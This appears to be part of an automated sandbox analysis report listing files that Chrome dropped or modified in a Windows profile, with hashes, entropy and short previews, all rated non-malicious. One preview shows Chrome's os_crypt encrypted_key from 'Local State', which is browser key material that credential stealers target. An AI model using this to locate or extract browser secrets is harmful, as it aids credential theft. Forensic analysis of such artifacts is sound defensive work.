                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):420
                                                                                                                                                Entropy (8bit):4.985305467053914
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
                                                                                                                                                MD5:C401B619D9D8E0ADABC25A47EE49CFBA
                                                                                                                                                SHA1:C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
                                                                                                                                                SHA-256:8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
                                                                                                                                                SHA-512:BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\000003.log
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):80
                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: *...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):415
                                                                                                                                                Entropy (8bit):5.265905370390252
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRUyAq2PWXp+N23iKKdKusNpZQMxIFUtnEeRUbZmwBEeRU4kwOWXp+N23iKK+:pvyyAva5KkMFUtnvyb/Bvy45f5KkTJ
                                                                                                                                                MD5:D4586C20AA021CDF26D8393D5FDFC9A3
                                                                                                                                                SHA1:B10541B4CA058DB10D427CB68B0815C76CE652E5
                                                                                                                                                SHA-256:A9793BD0271D2953FA1F44CEB74A349F5384644528FC346AB141BD42D0BDDA2C
                                                                                                                                                SHA-512:4E8C83708D7AFEF6B59488A106CE3CF2C389E5EC11495BA113DEFECA9087E8A6CCD85C36F871A9D14FA412C617E54EECA6797AC00680FDA0CB59251F94D2EA09
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:41.764 df0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.2021/10/29-14:10:41.765 df0 Recovering log #3.2021/10/29-14:10:41.766 df0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG.oldos (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):415
                                                                                                                                                Entropy (8bit):5.265905370390252
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRUyAq2PWXp+N23iKKdKusNpZQMxIFUtnEeRUbZmwBEeRU4kwOWXp+N23iKK+:pvyyAva5KkMFUtnvyb/Bvy45f5KkTJ
                                                                                                                                                MD5:D4586C20AA021CDF26D8393D5FDFC9A3
                                                                                                                                                SHA1:B10541B4CA058DB10D427CB68B0815C76CE652E5
                                                                                                                                                SHA-256:A9793BD0271D2953FA1F44CEB74A349F5384644528FC346AB141BD42D0BDDA2C
                                                                                                                                                SHA-512:4E8C83708D7AFEF6B59488A106CE3CF2C389E5EC11495BA113DEFECA9087E8A6CCD85C36F871A9D14FA412C617E54EECA6797AC00680FDA0CB59251F94D2EA09
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:41.764 df0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.2021/10/29-14:10:41.765 df0 Recovering log #3.2021/10/29-14:10:41.766 df0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\f3f072f8-9740-417a-a88b-dfe93adcb8b1.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):420
                                                                                                                                                Entropy (8bit):4.985305467053914
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
                                                                                                                                                MD5:C401B619D9D8E0ADABC25A47EE49CFBA
                                                                                                                                                SHA1:C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
                                                                                                                                                SHA-256:8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
SHA-512:BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
Malicious:false
Reputation:unknown
Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ac7d1c27-d7ae-4dfb-862c-070a5827ea1e.tmp
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:UTF-8 Unicode text, with very long lines, with no line terminators
Category:modified
Size (bytes):17092
Entropy (8bit):5.583181891141964
Encrypted:false
SSDEEP:384:/cTtpLlG7Xk1kXqKf/pUZNCgVLH2HfDPrUPDLWo4h:WLlAk1kXqKf/pUZNCgVLH2HfrrUuoO
MD5:FBB21F03F922068D76A443D7681BC18A
SHA1:559BEFF9C85046840A57211712D2F54AE125D95B
SHA-256:B20A825A2AF7FB06E581B754DCAD60260DD1329A2A6A355B8A0687D00D810F7A
SHA-512:1C19F702C12476ED0DCD5FB569CF9A185C6818C878C3C5D8321D6D430B81B39AF5CB9BCED104A95AAA1279E236317D61A76301F6779E9B5449BE211CD10CE55B
Malicious:false
Reputation:unknown
Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13280015424813965","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Rv:1qIFJ
MD5:6752A1D65B201C13B62EA44016EB221F
SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
Malicious:false
Reputation:unknown
Preview: MANIFEST-000004.
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT. (copy)
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Rv:1qIFJ
MD5:6752A1D65B201C13B62EA44016EB221F
SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
Malicious:false
Reputation:unknown
Preview: MANIFEST-000004.
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):136
Entropy (8bit):4.460609817731167
Encrypted:false
SSDEEP:3:tUKj5U5MfRUcF30yZmwv2S5U5MfRXVNFWSV8tS5U5MfRXVNFWSWGv:maEeRUIZmwBEeRMSVhEeRMStv
MD5:ED595A3BDACDE073C1297DF727DBC4D0
SHA1:0D273E01F6A8B0C77892ADAD1909650E61A9EF77
SHA-256:56550BDC600F9DD8BB9134E4F954A9D1FC0939DA04F22FDD38B110BFB0866D6E
SHA-512:2A40594973C8947C63CFDB071F266413747CF19C424EFC121C5EDD6854C34D373950446D8301FDFFBECF2FF4F621CC25BEDE0EE948E4160B1C7AF7D9FF8BBA4B
Malicious:false
Reputation:unknown
Preview: 2021/10/29-14:10:41.124 8f4 Recovering log #3.2021/10/29-14:10:42.682 8f4 Delete type=0 #3.2021/10/29-14:10:42.682 8f4 Delete type=3 #2.
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old (copy)
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):136
Entropy (8bit):4.460609817731167
Encrypted:false
SSDEEP:3:tUKj5U5MfRUcF30yZmwv2S5U5MfRXVNFWSV8tS5U5MfRXVNFWSWGv:maEeRUIZmwBEeRMSVhEeRMStv
MD5:ED595A3BDACDE073C1297DF727DBC4D0
SHA1:0D273E01F6A8B0C77892ADAD1909650E61A9EF77
SHA-256:56550BDC600F9DD8BB9134E4F954A9D1FC0939DA04F22FDD38B110BFB0866D6E
SHA-512:2A40594973C8947C63CFDB071F266413747CF19C424EFC121C5EDD6854C34D373950446D8301FDFFBECF2FF4F621CC25BEDE0EE948E4160B1C7AF7D9FF8BBA4B
Malicious:false
Reputation:unknown
Preview: 2021/10/29-14:10:41.124 8f4 Recovering log #3.2021/10/29-14:10:42.682 8f4 Delete type=0 #3.2021/10/29-14:10:42.682 8f4 Delete type=3 #2.
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:MPEG-4 LOAS
Category:dropped
Size (bytes):50
Entropy (8bit):5.028758439731456
Encrypted:false
SSDEEP:3:Ukk/vxQRDKIVmt+8jzn:oO7t8n
MD5:031D6D1E28FE41A9BDCBD8A21DA92DF1
SHA1:38CEE81CB035A60A23D6E045E5D72116F2A58683
SHA-256:B51BC53F3C43A5B800A723623C4E56A836367D6E2787C57D71184DF5D24151DA
SHA-512:E994CD3A8EE3E3CF6304C33DF5B7D6CC8207E0C08D568925AFA9D46D42F6F1A5BDD7261F0FD1FCDF4DF1A173EF4E159EE1DE8125E54EFEE488A1220CE85AF904
Malicious:false
Reputation:unknown
Preview: V........leveldb.BytewiseComparator...#...........
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\e693ec52-2d0e-4227-8774-954423d894b9.tmp
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:L:L
MD5:5058F1AF8388633F609CADB75A75DC9D
SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:false
Reputation:unknown
Preview: .
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ee68a962-742b-43eb-93af-8db2e86d8ed6.tmp
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):5193
Entropy (8bit):4.977948195597817
Encrypted:false
SSDEEP:96:n8pCFc5I9pcKI1fok0JCKL8aTkjuzbOTQVuwn:n8pCF/9pcja4KJkjA
MD5:403C2C47933957AA76729FEE38AAC01B
SHA1:5A82E7091A8D5BFC88A4B52F309D5165A5203B2E
SHA-256:8BFECC26C3A718F73B8D4EEA149967FF700177190CC8A1F4304286A337C348F6
SHA-512:2DABEEC46ECDC95366EFEAEDD6A676B71FAD3605DC851839DA9434A4F48D302DBDAA7934219910F3F623273DAC59488A22F1A269E54F3E29F2B700F599185AFF
Malicious:false
Reputation:unknown
Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13280015426034104","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):2151
Entropy (8bit):4.89628161613295
Encrypted:false
SSDEEP:48:Y2TntwCXGDH3qz5sCGsQRLsC2HZrsysAMyKs4MHKsmMHgzYhbD:JTnOCXGDHazpCmZrsOM9GIG9hH
MD5:906A257501BB067F8C7EC0583389BD7E
SHA1:3EB950BD6BBE5D2BD5BBF5AAB211A306295062FF
SHA-256:E3221CD0FCEA91239BC8428F5F1661EDFCC2D8E4E019212552E4D5487FE824B3
SHA-512:DE030BD9541604557042C7CC3CF3DCF0DDEA5FF00D0CF7198D2AA4CD1F0829D791E22D75B41C05BA23AC23ADFCE39712A6E2F4E2958A73C1E4A41A5352D4986B
Malicious:false
Reputation:unknown
Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13282607428238388","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://redirector.gvt1.com"},{"alternative_service":[{"advertised_versions":[50],"expiration":"13282607428244406","port":443,"protocol_str":"quic"}],"isol
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):4219
Entropy (8bit):4.871684703914691
Encrypted:false
SSDEEP:48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
MD5:EDC4A4E22003A711AEF67FAED28DB603
SHA1:977E551B9ED5F60D018C030B0B4AA2E33B954556
SHA-256:DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
SHA-512:84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
Malicious:false
Reputation:unknown
Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):335
Entropy (8bit):5.126205610080349
Encrypted:false
SSDEEP:6:maEeR2q2PWXp+N23iKKdKfrzAdIFUtnEeRsBZmwBEeRsbkwOWXp+N23iKKdKfrzS:pvkva5Kk9FUtnvqB/Bvqb5f5Kk2J
MD5:BC3D75492A9CEDB07489A2B2AA0896C0
SHA1:4571A89962260C4A10B0054E3E1235507887E42D
SHA-256:2B82B394BCCEB5A449A994A8AC220A776B1D42CAD16D41A8CFBA9D18ADDA97B9
                                                                                                                                                SHA-512:BB625611546CAD40183386B96C2A256DC84A25F91937E1CD4F9BE40824CF2FDA6A12AB7AD2C7BD066432B46417E0F154703C3EA132C40C2D087EFED559A00140
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:44.200 df0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/10/29-14:10:44.201 df0 Recovering log #3.2021/10/29-14:10:44.201 df0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old8f (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):335
                                                                                                                                                Entropy (8bit):5.126205610080349
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeR2q2PWXp+N23iKKdKfrzAdIFUtnEeRsBZmwBEeRsbkwOWXp+N23iKKdKfrzS:pvkva5Kk9FUtnvqB/Bvqb5f5Kk2J
                                                                                                                                                MD5:BC3D75492A9CEDB07489A2B2AA0896C0
                                                                                                                                                SHA1:4571A89962260C4A10B0054E3E1235507887E42D
                                                                                                                                                SHA-256:2B82B394BCCEB5A449A994A8AC220A776B1D42CAD16D41A8CFBA9D18ADDA97B9
                                                                                                                                                SHA-512:BB625611546CAD40183386B96C2A256DC84A25F91937E1CD4F9BE40824CF2FDA6A12AB7AD2C7BD066432B46417E0F154703C3EA132C40C2D087EFED559A00140
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:44.200 df0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/10/29-14:10:44.201 df0 Recovering log #3.2021/10/29-14:10:44.201 df0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_1
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):270336
                                                                                                                                                Entropy (8bit):0.0018238520723782249
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zELqCjtl:/M/xT02zSBl
                                                                                                                                                MD5:4D6A87B837034502A12B3821F7C67DB9
                                                                                                                                                SHA1:2D9AEFD5997E23FA1AC4FCD4F3BEF29FB8514207
                                                                                                                                                SHA-256:774273543D373714C0F766A844038E50D14A69C70281883599D0EF65F7E10D92
                                                                                                                                                SHA-512:599B9EF531293B6AE2D99E2F105E0A5ECE1AD8CF998FD0F14B812A62080527B0AC4BB67970E761D05B6CB5C1ED5AC3D313E05812E7BEF20AFD1FAC7394B797D8
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106
                                                                                                                                                Entropy (8bit):3.138546519832722
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
                                                                                                                                                MD5:DE9EF0C5BCC012A3A1131988DEE272D8
                                                                                                                                                SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
                                                                                                                                                SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
                                                                                                                                                SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):13
                                                                                                                                                Entropy (8bit):2.8150724101159437
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Yx7:4
                                                                                                                                                MD5:C422F72BA41F662A919ED0B70E5C3289
                                                                                                                                                SHA1:AAD27C14B27F56B6E7C744A8EC5B1A7D767D7632
                                                                                                                                                SHA-256:02E71EB4C587FEB7EE00CE8600F97411C2774C2FC34CB95B92D5538E7F30DA59
                                                                                                                                                SHA-512:86010ED2B2EEBDCC5A8A076B37703669C294C6D1BFAAEA963E26A9C94B81B4C53EC765D9425E5B616159C43923F800A891F9B903659575DF02F8845521F8DC46
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 85.0.4183.121
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780072694005
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hrFLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:pFLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:9A3435BB2916D49F5662DF2DF9B0234A
                                                                                                                                                SHA1:7FB511EA0AB19F8497578647E031083111A67A9C
                                                                                                                                                SHA-256:BFD8A4F5CCA6D59405E9D0E4FFDB32E8A37EAFBAF1855AE9F4FD57DABD10CCBA
                                                                                                                                                SHA-512:9CE8ECCD4AF9E34CC3FAF9F8BE21E3B591140366FC947FDB8238AD2C0808C8AEA7FD0FB91B67A1F2F50F644793DC6A328EEC02D4E9C8C12BA6DE2F0B997B9BB2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State2. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):87023
                                                                                                                                                Entropy (8bit):6.102321908149239
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SUuGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SUuFcbXafIB0u1GOJmA3iuR+
                                                                                                                                                MD5:04EA3ECF47F46C9AB073A1A8CAE1617E
